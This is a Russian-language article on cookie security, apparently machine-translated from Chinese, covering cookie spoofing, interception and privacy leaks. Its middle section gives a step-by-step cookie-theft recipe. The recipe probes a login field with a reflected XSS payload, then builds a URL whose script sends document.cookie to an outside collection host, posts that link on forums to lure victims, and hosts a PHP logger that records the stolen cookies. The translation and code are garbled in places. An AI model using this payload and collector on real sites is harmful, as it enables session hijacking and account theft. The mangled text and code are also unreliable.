Целью файлов cookie является предоставление удобства для пользователей и повысить ценность веб -сайта, и, как правило, не представляет серьезную угрозу безопасности. Файл cookie не может быть выполнен в качестве кода и не передает вирусы, он является собственностью пользователю и может быть прочитал только сервером, который его создал. Кроме того, браузеры, как правило, позволяют хранить только 300 файлов cookie, каждый сайт хранит до 20 файлов cookie, а размер каждого печенья ограничен 4 КБ. Следовательно, файлы cookie не заполнят жесткий диск и не будут использоваться в качестве метода атаки «отказ в обслуживании».
Однако, как заменитель идентификации пользователя, его безопасность иногда определяет безопасность всей системы, и безопасность файлов cookie нельзя игнорировать.
(1) Фализиаты cookie Spoof файлы cookie записывают информацию, такую как идентификатор учетной записи пользователя, пароль и т. Д., И обычно зашифрованы с использованием метода MD5 и передаются в Интернете. Зашифрованная информация не может быть понята, даже если она перехватывается некоторыми людьми с скрытыми мотивами в Интернете. Тем не менее, проблема в том, что люди, которые перехватывают куки, не должны знать значение этих строк. Пока кто -то отправляет куки других людей на сервер и может пройти проверку, он может войти на веб -сайт в качестве жертвы. Такое поведение называется подделками печенья.
Нелегальные пользователи получают соответствующие ключи шифрования через файлы cookie, тем самым доступая за ко всей персонализированной информации законных пользователей, включая электронную почту пользователя и даже информацию об учетной записи, что наносит серьезный ущерб личной информации.
(2) перехват печенья
Файлы cookie передаются между браузером и сервером в простом тексте и легко перехватываются и эксплуатируются другими. Файлы cookie могут быть прочитаны всеми, кто может перехватить веб -коммуникации.
После того, как файл cookie перехвачен незаконным пользователем, а затем воспроизводится в течение его достоверного периода, нелегальный пользователь будет пользоваться правами и интересами юридического пользователя. Например, для онлайн -чтения незаконные пользователи могут наслаждаться онлайн -чтением электронных журналов, не заплатив плату.
Есть некоторые методы перехвата файлов cookie :
(1) Используйте методы программирования для перехвата файлов cookie. Ниже приведено анализ своего метода, который выполняется через два шага.
Шаг 1: позиционируйте веб -сайт, который должен собирать cookie, анализировать их и построить URL -адреса. Во -первых, откройте веб -сайт, чтобы собрать cookie. Здесь предположим, что это http://www.xxx.net, войдите на веб -сайт и введите имя пользователя "<al>" (без учета кавычек), проанализируйте данные и возьмите пакет и получите следующий код:
http://www.xxx.net/txl/login/login.pl? username = <al> & passwd = & ok.x = 28 & ok.y = 6;
Заменить "<al>" на:
«<cript> alert (document.cookie) </script>» Попробуйте еще раз, и если выполнение будет успешным, начните строить URL:
http://www.xxx.net/txl/login/login.pl? username = <script> window.open ("http://www.cbifamily.org/cbi.php?"%2bdocument.cookie)</script>&passwd=&ok.x=28&ok.y=6.
Среди них http://www.cbifamily.org/cbi.php - это скрипт на хосте, который пользователь может управлять. Следует отметить, что «%2b» - это URL -кодирование символа «+», потому что «+» будет обрабатываться как пространство. Этот URL может быть опубликован на форуме, чтобы побудить других щелкнуть.
Шаг 2: Приготовьте сценарий PHP для сбора файлов cookie и поместите его на веб -сайт, который пользователь может управлять. Когда неизвестный человек нажимает на построенный URL, код PHP может быть выполнен. Конкретное содержание этого сценария следующее:
Кода -копия выглядит следующим образом:
<? Php
$ info = getenv ("ouery_string");
if ($ info) {
$ fp = fopen ("info.txt", "a");
fwrite ($ fp ,! info. "/n");
Fclose ($ fp);
}
заголовок ("Местоположение: http: //www.xxx.net");
?>
Размещение этого кода в сеть может собирать все файлы cookie. Если форум разрешает HTML -код или флэш -теги, вы можете использовать эти технологии для сбора файлов cookie и поместить их на форум, а затем предоставить Post привлекательную тему и написать интересный контент и быстро собрать большое количество файлов cookie. На форуме многие пароли были украдены этим методом.
(2) Используйте код Flash, скрытую опасность для перехвата cookie. В Flash есть функция geturl (). Flash может использовать эту функцию для автоматического открытия указанной веб -страницы, которая может привести пользователя к веб -сайту, содержащему вредоносный код. Например, когда пользователь пользуется анимацией флэш -анимации на компьютере, код в анимационной раме, возможно, был тихо подключен к Интернету и открывает очень маленькую страницу, содержащую специальный код, который может собирать куки и делать другие вредные вещи. Веб -сайт не может запретить это действие Flash, потому что это внутренняя функция файла Flash.
(3) Конфиденциальность сети Cookie Cookie
Основная причина, по которой файлы cookie приводят к утечкам конфиденциальности в Интернете, - это: обусловлено коммерческими интересами. С ростом электронной коммерции и появлением огромных возможностей для бизнеса в Интернете некоторые веб-сайты и учреждения злоупотребляют файлами cookie и используют технологии поисковых систем, технологии интеллектуального анализа данных и даже технологию онлайн-обмана для сбора личной информации других людей без разрешения посетителей, чтобы достичь получения прибыли, таких как создание баз данных пользователей и отправка рекламы, что приводит к ликвидации пользователей. «Открытость передачи информации о файлах файлов cookie. Файлы cookie имеют специальные процессы доставки и характеристики текста. Файлы cookie, которые не надежно зашифруются между сервером и клиентом, что может легко привести к утечке личной информации.
Вышеуказанное - все это личное понимание безопасности файлов cookie. Если есть какие -либо упущения, поправьте их.